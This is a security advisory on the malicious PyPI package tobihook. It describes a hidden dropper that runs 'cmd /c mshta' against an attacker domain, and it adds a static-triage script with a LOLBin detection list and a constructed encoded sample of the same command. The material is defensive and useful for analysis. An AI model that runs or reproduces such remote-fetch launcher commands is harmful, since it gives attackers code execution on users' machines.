MAL-2026-5995
Malicious code in tobihook (PyPI)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2c093ec7049ebbe26ca860033bc1fd81ad98f4f586b66fc68170e1ff81ae90bb)

The package masquerades as an HTTP helper (functions named post/get/fetch, a module comment '# request/__init__.py', and an unused requests dependency), but none of those functions performs a request. Each one base64-decodes a literal that yields the command 'cmd /c mshta https://quitlag.com' and launches it with subprocess.Popen, passing the CREATE_NO_WINDOW creation flag so that on Windows no console is shown. mshta.exe then fetches attacker-controlled HTA/JavaScript from quitlag.com and executes it on the caller's machine without any visible window. The dropper is concealed in tobihook/post.py behind roughly 400 lines of leading whitespace plus the base64 encoding, and it is reachable from the package's documented top-level API because tobihook/__init__.py re-exports post. Any developer who installs tobihook and calls its advertised post(), get() or fetch() triggers remote code execution on a Windows host; on other platforms the cmd/mshta invocation fails, but the package is still malicious and should be treated as such.
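The three indicators above (a base64 literal that decodes to a LOLBin launcher, a subprocess call with CREATE_NO_WINDOW, and hundreds of blank lines pushing the code below the fold) can be checked statically before a suspect package is ever imported. The script below is an added example written for this advisory, not the advisory source's or the package's own code: it parses a module with Python's ast, decodes every string literal that is valid base64, and flags the three patterns. The launcher regex, the whitespace threshold and the sample module text are assumptions for illustration; the sample uses example.invalid as a stand-in for the reported domain and generates its own encoded literal at runtime so that no encoded command is hardcoded here.

```python
"""Static triage of a suspect Python module (added example, not the advisory's tooling)."""
import ast
import base64
import binascii
import re

# Decoded literals that mention these launchers are flagged. The list is an assumption
# for this example; extend it for your environment.
LAUNCHER_RE = re.compile(
    r"\b(mshta|cmd(?:\.exe)?\s+/c|powershell|rundll32|regsvr32|certutil|[wc]script)\b", re.I
)
CREATE_NO_WINDOW = 0x08000000  # Windows process-creation flag (value from the Win32 API)
PAD_THRESHOLD = 100  # whitespace-only lines before the first statement; threshold is an assumption


def b64_payload(literal):
    """Return the decoded text if `literal` is base64 for a launcher command, else None."""
    s = literal.decode("ascii", "ignore") if isinstance(literal, bytes) else literal
    if len(s) < 8 or len(s) % 4:
        return None
    try:
        raw = base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("utf-8", "ignore")
    return text if LAUNCHER_RE.search(text) else None


def leading_pad(source):
    """Count whitespace-only lines before the first non-comment statement."""
    n = 0
    for line in source.splitlines():
        stripped = line.strip()
        if stripped and not stripped.startswith("#"):
            break
        if not stripped:
            n += 1
    return n


def uses_no_window(call):
    """True if a subprocess.* call passes CREATE_NO_WINDOW (by name or by bit) in creationflags."""
    func = call.func
    name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
    if name not in {"Popen", "run", "call", "check_call", "check_output"}:
        return False
    for kw in call.keywords:
        if kw.arg != "creationflags":
            continue
        for sub in ast.walk(kw.value):  # handles `A | B` expressions as well as a bare name
            if isinstance(sub, ast.Attribute) and sub.attr == "CREATE_NO_WINDOW":
                return True
            if isinstance(sub, ast.Constant) and isinstance(sub.value, int) and sub.value & CREATE_NO_WINDOW:
                return True
    return False


def triage(source):
    """Return (indicator, detail) pairs for one module's source text; empty list means nothing seen."""
    findings = []
    pad = leading_pad(source)
    if pad >= PAD_THRESHOLD:
        findings.append(("leading_whitespace", f"{pad} blank lines before first statement"))
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)):
            decoded = b64_payload(node.value)
            if decoded:
                findings.append(("b64_launcher", f"line {node.lineno}: {decoded}"))
        elif isinstance(node, ast.Call) and uses_no_window(node):
            findings.append(("hidden_window", f"line {node.lineno}: subprocess call with CREATE_NO_WINDOW"))
    return findings


# Constructed sample mimicking the reported layout (not the real tobihook source).
# example.invalid stands in for the reported domain; the encoded literal is built at runtime.
_CMD = base64.b64encode(b"cmd /c mshta https://example.invalid/x.hta").decode()
SAMPLE_POST_PY = (
    "# request/__init__.py\n"
    + "\n" * 400
    + "import base64, subprocess\n"
    + "GREETING = 'aGVsbG8gd29ybGQ='  # benign base64 ('hello world'), must not be flagged\n"
    + "def post(url, data=None):\n"
    + f"    c = base64.b64decode('{_CMD}').decode()\n"
    + "    return subprocess.Popen(c, creationflags=subprocess.CREATE_NO_WINDOW)\n"
)

if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_POST_PY):
        print(kind, detail)
```

Run it against each .py file of an unpacked sdist or wheel before installing; a hit on b64_launcher or hidden_window in a package that claims to be an HTTP helper is reason enough to stop. The check is deliberately narrow (standard base64 only, a fixed launcher list) so that it produces few false positives; it will not catch other encodings or string-building tricks, and it is a triage aid, not a substitute for reading the code.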
Affected packages
No fixed version has been published for tobihook (pip), and none should be expected: this is a malicious package, not a vulnerable one, so there is no known-safe version to pin to. The release referenced below is 1.0.4. Remove tobihook from every environment, requirements file and lockfile that lists it, and treat any Windows host on which its post(), get() or fetch() was called as compromised, since mshta fetched and ran attacker-controlled code there.
References
- https://pypi.org/project/tobihook/1.0.4/ [PACKAGE]